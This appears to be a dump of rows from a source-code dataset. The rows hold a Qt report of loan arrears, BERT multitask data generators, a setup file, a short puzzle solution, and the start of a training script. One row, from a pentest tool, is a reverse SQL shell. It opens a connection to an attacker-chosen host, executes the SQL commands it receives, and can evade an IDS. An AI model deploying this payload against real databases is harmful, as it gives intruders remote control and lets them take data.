blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
11f73fbe56bc17b3b0a1fd41fe7b785b16cb6ab0 | 4a6d784fd44b57d6b2aabae9d2381884cc880aea | /w_form_cuotas_vencidas_30dias.py | 53a4658d5a415681d07bdf21ca61bb9eac419f7d | [] | no_license | blueautomatic/Slam_Sistema_creditos | 0e46c2f23d396793122739f838073eff77df88e3 | 7eb20a90abce53f10dcd18e3d47e9a5f330acbbd | refs/heads/master | 2020-03-26T19:13:36.634824 | 2018-02-05T15:46:42 | 2018-02-05T15:46:42 | 145,254,325 | 0 | 0 | null | 2018-08-18T21:37:23 | 2018-08-18T21:37:23 | null | UTF-8 | Python | false | false | 13,010 | py | import sys,datetime,os
from PyQt5.QtWidgets import QApplication,QDialog,QMessageBox, QTableWidgetItem
from PyQt5 import uic
from form_cuotas_vencidas_30dias import Ui_form_cuotas_vencidas_30dias
from N_cliente import N_datos_personales_cliente, N_party_address, N_party_otros, N_datos_laborales, N_party_garante,N_party_cliente, N_party_contacto
from N_creditos import N_creditos
from N_cuotas import N_cuotas
from PyQt5.QtCore import pyqtRemoveInputHook
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.pagesizes import A4
from reportlab.lib.styles import getSampleStyleSheet,ParagraphStyle
from reportlab.platypus import Spacer, SimpleDocTemplate, Table, TableStyle
from reportlab.platypus import Paragraph, Image
from reportlab.lib import colors
from PyQt5.QtWidgets import QFileDialog
from E_configuracion import configuracion
import subprocess
class Cuotas_vencidas_30dias(QDialog):
obj_form = Ui_form_cuotas_vencidas_30dias()
listado_cuotas_30_dias = list()
listado_cuotas_60_dias = list()
listado_cuotas_90_dias = list()
def __init__(self):
QDialog.__init__(self)
self.obj_form = Ui_form_cuotas_vencidas_30dias()
self.obj_form.setupUi(self)
self.obj_form.boton_generar.clicked.connect(self.generar_30dias)
self.obj_form.boton_generar_60_dias.clicked.connect(self.generar_60dias)
self.obj_form.boton_generar_90_dias.clicked.connect(self.generar_90dias)
def generar_30dias(self):
obj_N_cuotas = N_cuotas(1)
self.listado_cuotas_30_dias = obj_N_cuotas.lista_cuotas_venc_30_dias()
styleSheet=getSampleStyleSheet()
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
img=Image("cabezal.png",250,75)
img.hAlign = "LEFT"
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
texto_principal = ""
estilo_texto = ParagraphStyle('',
fontSize = 22,
alignment = 0,
spaceBefore = 0,
spaceAfter = 0,
#backColor = '#fff',
textColor = '#999',
leftIndent = 10 )
h = Paragraph( texto_principal, estilo_texto)
banner = [ [ img,h ] ]
options = QFileDialog.Options()
story=[]
ban = Table( banner, colWidths=300, rowHeights=10)
ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
story.append(ban)
story.append(Spacer(0,-17))
P= Paragraph("<b>Reportes</b> ",otro_estilo)
story.append(P)
story.append(Spacer(0,25))
P=Paragraph("<b>Cuotas vencidas hasta 30 dias</b> " + str(datetime.datetime.now()),style_barra)
story.append(P)
story.append(Spacer(0,25))
#nombre apellido dni Nro prestamo nro cuota monto
integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
for item in self.listado_cuotas_30_dias:
monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
obj_N_credito = N_creditos(1)
obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
obj_N_datos_personales_cliente = N_datos_personales_cliente()
obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(monto_adeudado)])
t=Table(integrantes, (150,135, 100, 55, 55,55))
t.setStyle(TableStyle([
('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
('BOX', (0,1), (-1,-1), 0.25, colors.black),
('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
]))
story.append(t)
story.append(Spacer(0,15))
obj_config = configuracion()
cadena = obj_config.ruta()
file_path = cadena + "/pdf/listados/list_morosos_30dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
if not os.path.exists(file_path):
os.makedirs(file_path)
doc=SimpleDocTemplate(file_path +"/listado_de_morosos_30dias.pdf")
doc.build(story )
msgBox = QMessageBox()
msgBox.setWindowTitle("Estado de Listado")
msgBox.setText("El Listado se ha generado correctamente : ticket listado_de_morosos_30dias.pdf")
msgBox.exec_()
if sys.platform == 'linux':
subprocess.call(["xdg-open", file_path +"/listado_de_morosos_30dias.pdf"])
else:
os.startfile( file_path +"/listado_de_morosos_30dias.pdf")
def generar_60dias(self):
obj_N_cuotas = N_cuotas(1)
self.listado_cuotas_60_dias = obj_N_cuotas.lista_cuotas_venc_60_dias("slam")
styleSheet=getSampleStyleSheet()
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
img=Image("cabezal.png",250,75)
img.hAlign = "LEFT"
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
texto_principal = ""
estilo_texto = ParagraphStyle('',
fontSize = 22,
alignment = 0,
spaceBefore = 0,
spaceAfter = 0,
#backColor = '#fff',
textColor = '#999',
leftIndent = 10 )
h = Paragraph( texto_principal, estilo_texto)
banner = [ [ img,h ] ]
options = QFileDialog.Options()
story=[]
ban = Table( banner, colWidths=300, rowHeights=10)
ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
story.append(ban)
story.append(Spacer(0,10))
P= Paragraph("<b>Reportes</b> ",otro_estilo)
story.append(P)
story.append(Spacer(0,25))
P=Paragraph("<b>Cuotas vencidas hasta 60 dias</b> "+ str(datetime.datetime.now()),style_barra)
story.append(P)
story.append(Spacer(0,25))
#nombre apellido dni Nro prestamo nro cuota monto
integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
for item in self.listado_cuotas_60_dias:
monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
obj_N_credito = N_creditos(1)
obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
obj_N_datos_personales_cliente = N_datos_personales_cliente()
obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(round(monto_adeudado,2))])
t=Table(integrantes, (150,135, 100, 55, 55,55))
t.setStyle(TableStyle([
('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
('BOX', (0,1), (-1,-1), 0.25, colors.black),
('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
]))
story.append(t)
story.append(Spacer(0,15))
obj_config = configuracion()
cadena = obj_config.ruta()
file_path = cadena + "/pdf/listados/list_morosos_60dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
if not os.path.exists(file_path):
os.makedirs(file_path)
doc=SimpleDocTemplate(file_path +"/listado_de_morosos_60dias.pdf")
doc.build(story )
msgBox = QMessageBox()
msgBox.setWindowTitle("Estado de Listado")
msgBox.setText("El Listado se ha generado correctamente : Listado listado_de_morosos_60dias.pdf")
msgBox.exec_()
if sys.platform == 'linux':
subprocess.call(["xdg-open", file_path +"/listado_de_morosos_60dias.pdf"])
else:
os.startfile( file_path +"/listado_de_morosos_60dias.pdf")
def generar_90dias(self):
obj_N_cuotas = N_cuotas(1)
self.listado_cuotas_90_dias = obj_N_cuotas.lista_cuotas_venc_90_dias("slam")
styleSheet=getSampleStyleSheet()
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
img=Image("cabezal.png",250,75)
img.hAlign = "LEFT"
#pyqtRemoveInputHook()
#import pdb; pdb.set_trace()
otro_estilo= ParagraphStyle('',fontSize = 20,textColor = '#000',leftIndent = 200,rightIndent = 50)
style_barra= ParagraphStyle('',fontSize = 13,textColor = '#000',backColor='#f5f5f5',borderColor ='#a3a3a3',borderWidth = 1,borderPadding = (1, 2, 5))
texto_principal = ""
estilo_texto = ParagraphStyle('',
fontSize = 22,
alignment = 0,
spaceBefore = 0,
spaceAfter = 0,
#backColor = '#fff',
textColor = '#999',
leftIndent = 10 )
h = Paragraph( texto_principal, estilo_texto)
banner = [ [ img,h ] ]
options = QFileDialog.Options()
story=[]
ban = Table( banner, colWidths=300, rowHeights=10)
ban.setStyle([ ('ALIGN',(0,0),(0,0),'LEFT'),('ALIGN',(0,0),(1,0),'LEFT'), ('VALIGN',(0,0),(1,0),'TOP'),
('TEXTCOLOR',(0,1),(0,-1), colors.blue) ])
story.append(ban)
story.append(Spacer(0,-17))
P= Paragraph("<b>Reportes</b> ",otro_estilo)
story.append(P)
story.append(Spacer(0,25))
P=Paragraph("<b>Cuotas vencidas hasta 90 dias</b> " + str(datetime.datetime.now()),style_barra)
story.append(P)
story.append(Spacer(0,25))
#nombre apellido dni Nro prestamo nro cuota monto
integrantes = [[Paragraph('''<font size=12> <b> </b></font>''',styleSheet["BodyText"])],
['Apellido', 'Nombre', 'D.N.I:', 'Nro Crédito:','Nro Cuota','Monto']]
for item in self.listado_cuotas_90_dias:
monto_adeudado = float(item.importe_primer_venc) + float(item.punitorios)
obj_N_credito = N_creditos(1)
obj_credito = obj_N_credito.buscar_credito_por_nro_credito(item.nro_credito)
obj_N_datos_personales_cliente = N_datos_personales_cliente()
obj_party = obj_N_datos_personales_cliente.buscar_party_party_por_id(obj_credito.id_party)
integrantes.append([str(obj_party.apellido), str(obj_party.nombre), str(obj_party.nro_doc) ,str(item.nro_credito),str(item.nro_cuota), str(round(monto_adeudado,2))])
t=Table(integrantes, (150,155, 100, 55, 55,55))
t.setStyle(TableStyle([
('INNERGRID', (0,1), (-1,-1), 0.25, colors.black),
('BOX', (0,1), (-1,-1), 0.25, colors.black),
('BACKGROUND',(0,1),(-1,1),colors.lightgrey)
]))
story.append(t)
story.append(Spacer(0,15))
obj_config = configuracion()
cadena = obj_config.ruta()
file_path = cadena + "/pdf/listados/listado_de_morosos_90dias"+str(datetime.date.today().year)+"_"+str(datetime.date.today().month)
if not os.path.exists(file_path):
os.makedirs(file_path)
doc=SimpleDocTemplate(file_path +"/listado_de_morosos_90dias.pdf")
doc.build(story )
msgBox = QMessageBox()
msgBox.setWindowTitle("Estado de Listado")
msgBox.setText("El Listado se ha generado correctamente : Listado listado_de_morosos_90dias.pdf")
msgBox.exec_()
if sys.platform == 'linux':
subprocess.call(["xdg-open", file_path +"/listado_de_morosos_90dias.pdf"])
else:
os.startfile( file_path +"/listado_de_morosos_90dias.pdf")
#app = QApplication(sys.argv)
#dialogo= Cuotas_vencidas_30dias()
#dialogo.show()
#app.exec_()
| [
"[email protected]"
] | |
8cae290d2e0f4814c027458fafbd56b76c6c8859 | e99bc88c211c00a701514761fdfcb9b755e6de4e | /payloads/oracle/reverse_sql.py | c8a4d05996c833f8976901daa94da532f212e589 | [] | no_license | Wuodan/inguma | 177f40f636d363f081096c42def27986f05e37e7 | c82e7caf86e24ad9783a2748c4f1d9148ad3d0ee | refs/heads/master | 2020-03-26T21:52:28.421738 | 2013-03-20T20:45:13 | 2018-08-20T12:19:30 | 145,413,992 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,506 | py | #!/usr/bin/python
"""
NOTE: Should be rewritten from scratch!!!!
"""
import sys
sys.path.append("../../lib")
sys.path.append("../lib")
sys.path.append("lib")
import run_command
from oracleids import randomizeSpaces
data = """
DECLARE
data varchar2(32767);
v_ret varchar2(32767);
len number;
conn utl_tcp.connection;
BEGIN
conn := utl_tcp.open_connection(remote_host => '%HOST%', remote_port => %PORT%, charset => 'US7ASCII');
loop
data := utl_tcp.get_line(conn);
data := substr(data, 1, length(data)-1);
if lower(data) = 'exit' then
exit;
else
begin
if lower(data) like 'select%' then
execute immediate data into v_ret;
else
execute immediate data;
v_ret := 'Statement executed';
end if;
len := utl_tcp.write_line(conn, 'RET:' || v_ret);
exception
when others then
len := utl_tcp.write_line(conn, 'ERROR: ' || sqlcode || ' - ' || sqlerrm);
end;
end if;
dbms_output.put_line('"' || data || '"');
end loop;
utl_tcp.close_connection(conn);
END;
"""
name = "reverse_sql"
brief_description = "Run a blind reverse SQL terminal"
class CPayload:
user = "TEST"
function = "F1"
useDML = False
covert = 0
verifyCommand = ""
connection = None
type = 0
host = ""
port = ""
connection = None
def __init__(self):
pass
def run(self):
global data
tmp = data
tmp = tmp.replace("%USER%", self.user)
if self.host == "":
self.host = raw_input("Host to connect: ")
if self.port == "":
self.port = raw_input("Port to listen: ")
tmp = tmp.replace("%HOST%", self.host)
tmp = tmp.replace("%PORT%", self.port)
if self.covert > 0:
# Currently only one IDS evasion technique is used
tmp = randomizeSpaces(tmp)
objRun = run_command.CPayload()
objRun.idsTechniques = self.covert
objRun.user = self.user
objRun.command = tmp
ret = objRun.run()
return ret
def verify(self, connection):
sql = self.verifyCommand
cursor = connection.cursor()
cursor.execute(sql)
for x in cursor.fetchall():
return True
return False
def main():
import cx_Oracle
a = CPayload()
a.idsTechniques = 1
cmd = a.run()
print cmd
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
acdee8e7dc59c9448b02b36d294aed46fbe74f2f | 0ca3a635fe2358ae562c04516226753fcd4a6729 | /src/create_generators.py | 64893b0a27c4158567b3833c44c58fc9d82963d0 | [] | no_license | YL1113/bert-multitask-learning | 9302037537c9c50a49ba2bb53a2f1db15904c7e2 | 182cb78efba46905cc1a804dcd7771b40475e874 | refs/heads/master | 2020-04-29T16:57:56.837957 | 2019-03-18T07:06:05 | 2019-03-18T07:06:05 | 176,280,952 | 1 | 0 | null | 2019-03-18T12:32:51 | 2019-03-18T12:32:50 | null | UTF-8 | Python | false | false | 16,070 | py | import random
from copy import copy
import numpy as np
import tensorflow as tf
from .utils import (punc_augument, tokenize_text_with_seqs,
create_mask_and_padding, create_masked_lm_predictions,
truncate_seq_pair, add_special_tokens_with_seqs,
BOS_TOKEN, EOS_TOKEN,
create_instances_from_document)
from .tokenization import printable_text
def create_single_problem_generator(problem,
inputs_list,
target_list,
label_encoder,
params,
tokenizer,
mode):
"""Function to create iterator for single problem
This function will:
1. Do some text cleaning using original bert tokenizer, if
problem type is sequential tagging, corresponding labels
will be removed.
Example:
Before: inputs: ['a', '&', 'c'] target: [0, 0, 1]
After: inputs: ['a', 'c'] target: [0, 1]
2. Add [CLS], [SEP] tokens
3. Padding
4. yield result dict
Arguments:
problem {str} -- problem name
inputs_list {list } -- inputs list
target_list {list} -- target list, should have the same length as inputs list
label_encoder {LabelEncoder} -- label encoder
params {Params} -- params
tokenizer {tokenizer} -- Bert Tokenizer
epoch {int} -- Deprecate
"""
problem_type = params.problem_type[problem]
# whether this problem is sequential labeling
# for sequential labeling, targets needs to align with any
# change of inputs
is_seq = problem_type in ['seq_tag']
for ex_index, example in enumerate(zip(inputs_list, target_list)):
raw_inputs, raw_target = example
# punctuation augumentation
if params.punc_replace_prob > 0 and mode == 'train':
raw_inputs = punc_augument(raw_inputs, params)
# tokenize inputs, now the length is fixed, target == raw_target
if isinstance(raw_inputs, dict):
tokens_a, target = tokenize_text_with_seqs(
tokenizer, raw_inputs['a'], raw_target, is_seq)
tokens_b, _ = tokenize_text_with_seqs(
tokenizer, raw_inputs['b'], raw_target)
else:
tokens_a, target = tokenize_text_with_seqs(
tokenizer, raw_inputs, raw_target, is_seq)
tokens_b = None
if tokens_b is not None and is_seq:
raise NotImplementedError(
'Sequence Labeling with tokens b is not implemented')
if not tokens_a:
continue
# check whether tokenization changed the length
if len(raw_inputs) != len(tokens_a):
tf.logging.warning('Data %d broken' % ex_index)
continue
# truncate tokens and target to max_seq_len
tokens_a, tokens_b, target = truncate_seq_pair(
tokens_a, tokens_b, target, params.max_seq_len, is_seq=is_seq)
# add [SEP], [CLS] tokens
tokens, segment_ids, target = add_special_tokens_with_seqs(
tokens_a, tokens_b, target, is_seq)
# train mask lm as augument task while training
if params.augument_mask_lm and mode == 'train':
rng = random.Random()
(mask_lm_tokens, masked_lm_positions,
masked_lm_labels) = create_masked_lm_predictions(
tokens,
params.masked_lm_prob,
params.max_predictions_per_seq,
list(tokenizer.vocab.keys()), rng)
_, mask_lm_tokens, _, _ = create_mask_and_padding(
mask_lm_tokens, copy(segment_ids), copy(target), params.max_seq_len, is_seq)
masked_lm_weights, masked_lm_labels, masked_lm_positions, _ = create_mask_and_padding(
masked_lm_labels, masked_lm_positions, None, params.max_predictions_per_seq)
mask_lm_input_ids = tokenizer.convert_tokens_to_ids(
mask_lm_tokens)
masked_lm_ids = tokenizer.convert_tokens_to_ids(masked_lm_labels)
input_mask, tokens, segment_ids, target = create_mask_and_padding(
tokens, segment_ids, target, params.max_seq_len, is_seq)
# create mask and padding for labels of seq2seq problem
if problem_type in ['seq2seq_tag', 'seq2seq_text']:
target, _, _ = truncate_seq_pair(
target, None, None, params.decode_max_seq_len, is_seq=is_seq)
# since we initialize the id to 0 in prediction, we need
# to make sure that BOS_TOKEN is [PAD]
target = [BOS_TOKEN] + target + [EOS_TOKEN]
label_mask, target, _, _ = create_mask_and_padding(
target, [0] * len(target), None, params.decode_max_seq_len)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
if isinstance(target, list):
label_id = label_encoder.transform(target).tolist()
label_id = [np.int32(i) for i in label_id]
else:
label_id = label_encoder.transform([target]).tolist()[0]
label_id = np.int32(label_id)
assert len(input_ids) == params.max_seq_len
assert len(input_mask) == params.max_seq_len
assert len(segment_ids) == params.max_seq_len, segment_ids
if is_seq:
assert len(label_id) == params.max_seq_len
# logging in debug mode
if ex_index < 5:
tf.logging.debug("*** Example ***")
tf.logging.debug("tokens: %s" % " ".join(
[printable_text(x) for x in tokens]))
tf.logging.debug("input_ids: %s" %
" ".join([str(x) for x in input_ids]))
tf.logging.debug("input_mask: %s" %
" ".join([str(x) for x in input_mask]))
tf.logging.debug("segment_ids: %s" %
" ".join([str(x) for x in segment_ids]))
if is_seq or problem_type in ['seq2seq_tag', 'seq2seq_text']:
tf.logging.debug("%s_label_ids: %s" %
(problem, " ".join([str(x) for x in label_id])))
tf.logging.debug("%s_label: %s" %
(problem, " ".join([str(x) for x in target])))
else:
tf.logging.debug("%s_label_ids: %s" %
(problem, str(label_id)))
tf.logging.debug("%s_label: %s" %
(problem, str(target)))
if params.augument_mask_lm and mode == 'train':
tf.logging.debug("mask lm tokens: %s" % " ".join(
[printable_text(x) for x in mask_lm_tokens]))
tf.logging.debug("mask lm input_ids: %s" %
" ".join([str(x) for x in mask_lm_input_ids]))
tf.logging.debug("mask lm label ids: %s" %
" ".join([str(x) for x in masked_lm_ids]))
tf.logging.debug("mask lm position: %s" %
" ".join([str(x) for x in masked_lm_positions]))
# create return dict
if not params.augument_mask_lm:
return_dict = {
'input_ids': input_ids,
'input_mask': input_mask,
'segment_ids': segment_ids,
'%s_label_ids' % problem: label_id
}
else:
if mode == 'train' and random.uniform(0, 1) <= params.augument_rate:
return_dict = {
'input_ids': mask_lm_input_ids,
'input_mask': input_mask,
'segment_ids': segment_ids,
'%s_label_ids' % problem: label_id,
"masked_lm_positions": masked_lm_positions,
"masked_lm_ids": masked_lm_ids,
"masked_lm_weights": masked_lm_weights,
}
else:
return_dict = {
'input_ids': input_ids,
'input_mask': input_mask,
'segment_ids': segment_ids,
'%s_label_ids' % problem: label_id,
"masked_lm_positions": np.zeros([params.max_predictions_per_seq]),
"masked_lm_ids": np.zeros([params.max_predictions_per_seq]),
"masked_lm_weights": np.zeros([params.max_predictions_per_seq]),
}
if problem_type in ['seq2seq_tag', 'seq2seq_text']:
return_dict['%s_mask' % problem] = label_mask
yield return_dict
def create_pretraining_generator(problem,
inputs_list,
target_list,
label_encoder,
params,
tokenizer
):
"""Slight modification of original code
Raises:
ValueError -- Input format not right
"""
if not isinstance(inputs_list[0][0], list):
raise ValueError('inputs is expected to be list of list of list.')
all_documents = []
for document in inputs_list:
all_documents.append([])
for sentence in document:
all_documents[-1].append(tokenizer.tokenize('\t'.join(sentence)))
all_documents = [d for d in all_documents if d]
rng = random.Random()
rng.shuffle(all_documents)
vocab_words = list(tokenizer.vocab.keys())
instances = []
print_count = 0
for _ in range(params.dupe_factor):
for document_index in range(len(all_documents)):
instances = create_instances_from_document(
all_documents,
document_index,
params.max_seq_len,
params.short_seq_prob,
params.masked_lm_prob,
params.max_predictions_per_seq,
vocab_words, rng)
for instance in instances:
tokens = instance.tokens
segment_ids = list(instance.segment_ids)
input_mask, tokens, segment_ids, _ = create_mask_and_padding(
tokens, segment_ids, None, params.max_seq_len)
masked_lm_positions = list(instance.masked_lm_positions)
masked_lm_weights, masked_lm_labels, masked_lm_positions, _ = create_mask_and_padding(
instance.masked_lm_labels, masked_lm_positions, None, params.max_predictions_per_seq)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
masked_lm_ids = tokenizer.convert_tokens_to_ids(
masked_lm_labels)
next_sentence_label = 1 if instance.is_random_next else 0
yield_dict = {
"input_ids": input_ids,
"input_mask": input_mask,
"segment_ids": segment_ids,
"masked_lm_positions": masked_lm_positions,
"masked_lm_ids": masked_lm_ids,
"masked_lm_weights": masked_lm_weights,
"next_sentence_label_ids": next_sentence_label
}
if print_count < 3:
tf.logging.debug('%s : %s' %
('tokens', ' '.join([str(x) for x in tokens])))
for k, v in yield_dict.items():
if not isinstance(v, int):
tf.logging.debug('%s : %s' %
(k, ' '.join([str(x) for x in v])))
print_count += 1
yield yield_dict
def create_generator(params, mode, epoch):
"""Function to create iterator for multiple problem
This function dose the following things:
1. Create dummy labels for each problems.
2. Initialize all generators
3. Sample a problem to train at this batch. If eval, take turns
4. Create a loss multiplier
5. Tried to generate samples for target problem, if failed, init gen
6. Add dummy label to other problems
Example:
Problem: CWS|NER|weibo_ner&weibo_cws
1. Dummy labels: CWS_label_ids: [0,0,0] ...
2. Blablabla
3. Sample, say (weibo_ner&weibo_cws)
4. loss multipliers: {'CWS_loss_multiplier': 0, ..., 'weibo_ner_loss_multiplier': 1, ...}
...
Arguments:
params {Params} -- params
mode {mode} -- mode
epoch {int} -- epochs to run
"""
# example
# problem_list: ['NER', 'CWS', 'weibo_ner', 'weibo_cws']
# problem_chunk: [['NER'], ['CWS'], ['weibo_ner', 'weibo_cws']]
problem_list = []
problem_chunk = []
for problem_dict in params.run_problem_list:
problem_list += list(problem_dict.keys())
problem_chunk.append(list(problem_dict.keys()))
# get dummy labels
def _create_dummpy_label(problem_type):
if problem_type == 'cls':
return 0
else:
return [0]*params.max_seq_len
dummy_label_dict = {problem+'_label_ids': _create_dummpy_label(
params.problem_type[problem]) for problem in problem_list if params.problem_type[problem] != 'pretrain'}
# init gen
gen_dict = {problem: params.read_data_fn[problem](params, mode)
for problem in problem_list}
while gen_dict:
# sample problem to train
if len(problem_chunk) > 1:
data_num_list = [params.data_num_dict[chunk[0]]
for chunk in problem_chunk]
if params.multitask_balance_type == 'data_balanced':
sample_prob = np.array(data_num_list) / np.sum(data_num_list)
current_problem_chunk_ind = np.random.choice(
list(range(len(problem_chunk))), p=sample_prob)
current_problem_chunk = problem_chunk[current_problem_chunk_ind]
elif params.multitask_balance_type == 'problem_balanced':
sample_prob = np.array(
[1]*len(data_num_list)) / np.sum([1]*len(data_num_list))
current_problem_chunk_ind = np.random.choice(
list(range(len(problem_chunk))), p=sample_prob)
current_problem_chunk = problem_chunk[current_problem_chunk_ind]
else:
current_problem_chunk = problem_chunk[0]
# create loss multiplier
loss_multiplier = {}
for problem in problem_list:
if problem in current_problem_chunk:
loss_multiplier[problem+'_loss_multiplier'] = 1
else:
loss_multiplier[problem+'_loss_multiplier'] = 0
base_dict = {}
base_input = None
for problem in current_problem_chunk:
try:
instance = next(gen_dict[problem])
except StopIteration:
if mode == 'train':
gen_dict[problem] = params.read_data_fn[problem](
params, mode)
instance = next(gen_dict[problem])
else:
del gen_dict[problem]
continue
except KeyError:
continue
base_dict.update(instance)
if base_input is None:
base_input = instance['input_ids']
elif not params.augument_mask_lm:
assert base_input == instance[
'input_ids'], 'Inputs id of two chained problem not aligned. Please double check!'
if not base_dict:
continue
# add dummpy labels
for dummy_problem in dummy_label_dict:
if dummy_problem not in base_dict:
base_dict[dummy_problem] = dummy_label_dict[dummy_problem]
# add loss multipliers
base_dict.update(loss_multiplier)
yield base_dict
| [
"[email protected]"
] | |
50c69f457a69549e37c8d673248b6a8b5ea1b3a8 | 8f02d21497912679d6ab91ea382ac9c477bda4fe | /setup.py | fb31227d6331999511c7297da29c6fb9b29c9e53 | [
"MIT"
] | permissive | DouglasWilcox/tpRigToolkit-dccs-maya-plugins-rbfsolver | ae2291f3e7117010341faeb7881998ec885dc216 | 3503c9b3982fe550a3d53dde79d3bf427c1b2289 | refs/heads/master | 2021-03-13T14:24:55.464354 | 2020-02-11T00:28:31 | 2020-02-11T00:28:31 | 246,688,218 | 1 | 0 | null | 2020-03-11T22:00:02 | 2020-03-11T22:00:01 | null | UTF-8 | Python | false | false | 104 | py | from setuptools import setup
from tpRigToolkit.dccs.maya.plugins.rbfsolver import __version__
setup()
| [
"[email protected]"
] | |
e55349cdae31ad6838c68bcf8a78353c4625794a | 1e0355b293100873cedfcac789655a35180781db | /BOJ1541.py | 80f1eee1110f147baa91c39f0bbea9e2989c2d24 | [
"MIT"
] | permissive | INYEONGKIM/BOJ | 47dbf6aeb7a0f1b15208866badedcd161c00ee49 | 5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc | refs/heads/master | 2021-06-14T13:50:04.124334 | 2021-03-09T14:04:14 | 2021-03-09T14:04:14 | 168,840,573 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | s=input().split("-")
if s[0]=="":
res=0
else:
res=sum(map(int,s[0].split("+")))
for i in range(1,len(s)):
res-=sum(map(int,s[i].split("+")))
print(res)
| [
"[email protected]"
] | |
aa718d4daf7a3e18af3a89fdaa2347cee9d3e036 | 7ba22c9826a1574777a08fb634ff15c56de6cb98 | /domain_adaptation/domain_separation/dsn_train.py | 2453d204f037ace6938252c8981854f5ef640dac | [] | no_license | dhanya1/full_cyclist | 02b85b8331f8ca9364169484ab97b32920cbbd14 | dd12c8d8a3deaaea15041e54f2e459a5041f11c2 | refs/heads/master | 2022-10-17T13:36:51.886476 | 2018-07-30T15:46:02 | 2018-07-30T15:46:02 | 142,896,293 | 0 | 1 | null | 2022-10-05T10:11:01 | 2018-07-30T15:46:15 | Python | UTF-8 | Python | false | false | 10,701 | py | # Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training for Domain Separation Networks (DSNs)."""
from __future__ import division
import tensorflow as tf
from domain_adaptation.datasets import dataset_factory
import dsn
slim = tf.contrib.slim
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_integer('batch_size', 32,
'The number of images in each batch.')
tf.app.flags.DEFINE_string('source_dataset', 'pose_synthetic',
'Source dataset to train_bkp on.')
tf.app.flags.DEFINE_string('target_dataset', 'pose_real',
'Target dataset to train_bkp on.')
tf.app.flags.DEFINE_string('target_labeled_dataset', 'none',
